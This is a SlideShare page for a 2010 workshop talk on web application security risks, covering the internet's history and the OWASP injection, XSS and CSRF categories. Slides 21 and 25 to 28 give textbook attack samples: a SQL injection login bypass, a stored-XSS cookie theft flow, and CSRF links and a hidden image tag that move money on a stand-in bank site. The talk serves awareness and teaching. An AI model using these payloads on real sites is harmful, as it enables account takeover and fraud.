Is the Web at Risk?

2,863
-1

Published on

A very short presentation held at the WIP2 workshop in Lisbon. This presentation talks about the security trends on the new WWW.

Published in: Technology
1 Comment
0 Likes
Statistics
Notes
  • Be the first to like this

No Downloads
Views
Total Views
2,863
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
44
Comments
1
Likes
0
Embeds 0
No embeds

No notes for slide

Is the Web at Risk?

  1. is the web @ risk ? World Internet Project Meeting 2010 ISCTE-IUL/SoTA/ADETTI-IUL Carlos Serrão Instituto Superior de Ciências do Trabalho e da Empresa carlos.serrao@iscte.pt Instituto Universitário de Lisboa carlos.j.serrao@gmail.com School of Technology and Architecture ADETTI-IUL http://www.carlosserrao.net http://blog.carlosserrao.net http://www.linkedin.com/in/carlosserrao
  2. Is the Web … … at risk? … a risk? … putting YOU at risk? WHY? HOW? WHEN?
  3. The Internet… … and the WWW, in the beg inning .
  4. in the beginning... Vinton Gray Cerf Robert Elliot Kahn … a.k.a. the “Internet fathers”
  5. The Internet was created… … as an ubiquitous … decentralized … standardized … global … interconnected … digital … communications channel.
  6. in the beginning... (Sir) Tim Berners Lee … a.k.a. the “WWW father”
  7. The WWW was created! A system of interlinked hypertext documents accessed via the Internet. Infinite worldwide knowledge access.
  8. growth
  9. evolving, growing network Small data part on Large amounts of Data on the Cloud a specific web-site data on a large (or limited number number of sites Applications on the of web-sites) Applications on the Web and Cloud desktop and Web Applications on the (more and more) Data almost desktop Part of the data inexistent on the Most data is on the still on desktop desktop (still on desktop (but also mobile) mobile) Data processing on Data processing on Data processing the desktop the desktop, but almost inexistent also on the web user
  10. evolving, growing network Small data part on Large amounts of Data on the Cloud a specific web-site data on a large (or limited number number of sites Applications on the of web-sites) Applications on the Web and Cloud desktop and Web Applications on the (more and more) Data almost desktop Part of the data inexistent on the Most data is on the still on desktop desktop (still on desktop (but also mobile) mobile) Data processing on Data processing on Data processing the desktop the desktop, but almost inexistent also on the web user
  11. evolving, growing network Small data part on Large amounts of Data on the Cloud a specific web-site data on a large (or limited number number of sites Applications on the of web-sites) Applications on the Web and Cloud desktop and Web Applications on the (more and more) Data almost desktop Part of the data inexistent on the Most data is on the still on desktop desktop (still on desktop (but also mobile) mobile) Data processing on Data processing on Data processing the desktop the desktop, but almost inexistent also on the web user
  12. security++   what do we have today?   anti-virus   anti-malware   anti-spyware   firewalls   intrusion detection systems   …   are they enough?
  13. security++   YES, but…   dothey protect the user from the web applications?   cana Web application be compromised to hurt legitimate users?   sure it can.
  14. security++   How?   Do you trust your favorite web-applications?   Google   Gmail   Doyou trust your favorite social-web applications?   Facebook   Twitter   Do you trust your homebanking?   Do you trust your government web-sites?
  15. security++ The security perimeter has huge security holes in the application Application Layer layer Legacy Systems Human Resrcs Web Services Directories Custom Developed Databases Application Code Billing APPLICATION ATTACK App Server Web Server Network Layer Hardened OS Firewall Firewall
  16. implications…
  17. security trends problem types typical problems on web apps
  18. the security risks http://www.owasp.org/index.php/Top_10
  19. security risks   considering the three most important   A1: Injection   A2: Cross Site Scripting (XSS)   A5: Cross Site Request Forgery (CSRF)
  20. A1: Injection what if?
  21. A1: Injection what if? SELECT * FROM users usr WHERE usr.username = ‘admin’;--’ AND usr.password=’bb21158c733229347bd4e681891e213d94c685be’
  22. A1: Injection what if?
  23. any input from the web app user can be an attack vector
  24. A2: Cross Site Scripting (XSS)   injecting malicious payload on the web app from the end-user side to be redirected to other users (victims)
  25. A2: Cross Site Scripting (XSS) 1 Attacker sets the trap – update my profile Application with stored XSS Attacker enters a vulnerability malicious script into a web page that stores the data on the server Knowledge Mgmt Communication Administration Bus. Functions E-Commerce Transactions 2 Victim views page – sees attacker profile Accounts Finance Custom Code Script runs inside victim’s browser with full access to the DOM and cookies 3 Script silently sends attacker Victim’s session cookie
  26. A5: Cross Site Request Forgery (CSRF)   an attacker can build its own malicious website and initiate request on the user’s browser
  27. A5: Cross Site Request Forgery (CSRF) Attacker sets the trap on some website on the internet 1 (or simply via an e-mail) Application with CSRF Hidden <img> tag vulnerability contains attack against vulnerable site Knowledge Mgmt Communication Administration Bus. Functions Transactions E-Commerce Accounts Finance While logged into vulnerable site, 2 victim views attacker site Custom Code 3 Vulnerable site sees <img> tag loaded by legitimate request browser – sends GET from victim and request (including performs the action credentials) to requested vulnerable site
  28. A5: Cross Site Request Forgery (CSRF) Alice transfer 100€ to Bob Bob through bank.com POST http://bank.com/transfer.do HTTP/1.1 ... ... ... Content-Length: 19; acct=BOB&amount=100 realizes that the same bank.com web application can execute Pirate the transfer using a URL with parameters GET http://bank.com/transfer.do?acct=BOB&amount=100 HTTP/1.1 will try to use Alice to transfer 100.000€ to its own account http://bank.com/transfer.do?acct=MARIA&amount=100000 sends an HTML email to Alice with an URL to click <a href="http://bank.com/transfer.do?acct=MARIA&amount=100000">View my Pictures!</a> or, sends an HTML email to Alice with a image to hide the attack <img src="http://bank.com/transfer.do?acct=MARIA&amount=100000" width="1" height="1" border="0"> Alice if Alice is authenticated at bank.com with an active session the transfer is performed
  29. consequences This is serious!!! And we are just looking at the tip of the iceberg!
  30. [quick] conclusions   Extra-care with the web applications you trust your data   Extra-care on the way you handle your email   Always act suspicious upon something “strange” on the web   WebApp developers take care on what you do – your code is part of the security perimeter
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×